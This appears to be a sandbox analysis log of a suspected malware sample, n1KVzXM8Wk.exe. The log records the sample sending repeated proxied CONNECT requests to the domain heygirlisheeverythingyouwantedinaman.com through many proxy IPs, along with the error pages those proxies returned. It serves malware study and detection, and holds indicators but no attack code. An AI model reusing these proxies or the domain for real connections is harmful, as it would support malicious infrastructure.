                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.689771891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1330192.168.2.450639195.114.209.50806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.690685034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.865825891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.318053007 CET835INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:35 GMT
                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                      Content-Length: 643
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 63 69 62 65 72 73 65 67 75 72 69 64 61 64 40 61 75 64 65 61 2e 65 73 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ciberseguridad@audea.es to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1331192.168.2.453837104.16.107.206806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.693965912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.781601906 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1332192.168.2.453793102.132.50.4980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.696157932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1333192.168.2.453807176.98.81.8580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.699498892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1334192.168.2.45381037.46.241.247806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.700855970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1335192.168.2.453814194.146.110.22810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.709199905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1336192.168.2.45343012.186.205.121806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.726272106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.852011919 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1337192.168.2.453877104.23.107.172806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.727235079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.815259933 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1338192.168.2.453811154.236.176.2819816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.734028101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.365777969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.179017067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.865900040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.975332022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.084397078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.178384066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1339192.168.2.45385118.135.211.18231286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.735907078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.895004034 CET169INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: Servlet/2.4
                                                                                                      Server: squid/6.0.0-20220501-re899e0c27
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1340192.168.2.453671199.58.184.9741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.746669054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1341192.168.2.453856130.162.213.17531296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.761940002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.957118988 CET1286INHTTP/1.1 500 Internal Server Error
                                                                                                      Server: squid/6.2-VCS
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 1112
                                                                                                      X-Squid-Error: ERR_CANNOT_FORWARD 0
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 45 52 52 5f 43 41 4e 4e 4f 54 5f 46 4f 52 57 41 52 44 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 3e 45 52 52 4f 52 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 32 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 54 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 72 65 74 72 69 65 76 65 20 74 68 65 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 3c 70 3e 3c 62 3e 53 68 69 65 6c 64 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 6f 72 77 61 72 64 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 63 6f 6e 66 69 67 75 72 65 64 20 75 70 73 74 72 65 61 6d 2e 2e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 2f 62 6c 6f 63 6b 71 75 6f 74 65 3e 0a 0a 3c 70 20 69 64 3d 22 73 79 73 6d 73 67 22 3e 54 68 65 20 73 79 73 74 65 6d 20 72 65 74 75 72 6e 65 64 3a 20 3c 69 3e 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 69 3e 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 3e 47 65 6e 65 72 61 74 65 64 20 46 72 69 2c 20 32 33 20 46 65 62 20 32 30 32 34 20 30 38 3a 34 35 3a 32 36 20 47 4d 54 20 62 79 20 45 72 69 63 6f 6d 20 28 65 73 2d 70 72 6f 78 79 2d 61 75 74 68 29 3c 2f 70 3e 0a 3c 21 2d 2d 20 45 52 52
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id=ERR_CANNOT_FORWARD><div id="titles"><h1>ERROR</h1><h2>The requested URL could not be retrieved</h2></div><hr><div id="content"><p>The following error was encountered while trying to retrieve the URL: <a href="https://heygirlisheeverythingyouwantedinaman.com/*">https://heygirlisheeverythingyouwantedinaman.com/*</a></p><blockquote id="error"><p><b>Shield is unable to forward your request to the configured upstream..</b></p></blockquote><p id="sysmsg">The system returned: <i>Please try again later.</i></p><br></div><hr><div id="footer"><p>Generated Fri, 23 Feb 2024 08:45:26 GMT by Ericom (es-proxy-auth)</p>... ERR


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1342192.168.2.453828195.87.217.7533896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.780235052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1343192.168.2.453870141.94.174.6137186812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.780235052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1344192.168.2.453789124.163.236.5473026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.783725023 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:27.247381926 CET90INHTTP/1.1 200 OK
                                                                                                      Content-Type: application/json
                                                                                                      Connection: close
                                                                                                      Content-Length: 55


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1345192.168.2.453948185.238.228.202806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.783735037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.871051073 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1346192.168.2.45347967.225.255.197632806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.816642046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1347192.168.2.45394245.61.188.134444996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.816829920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1348192.168.2.45391924.144.95.16880006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.817600012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1349192.168.2.453893142.54.232.641456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.819534063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1350192.168.2.45392951.89.173.40110586812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.824486971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.365751982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.975302935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.178371906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.366019011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.475302935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.577703953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.683618069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1351192.168.2.4538875.252.23.20610806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.824563980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
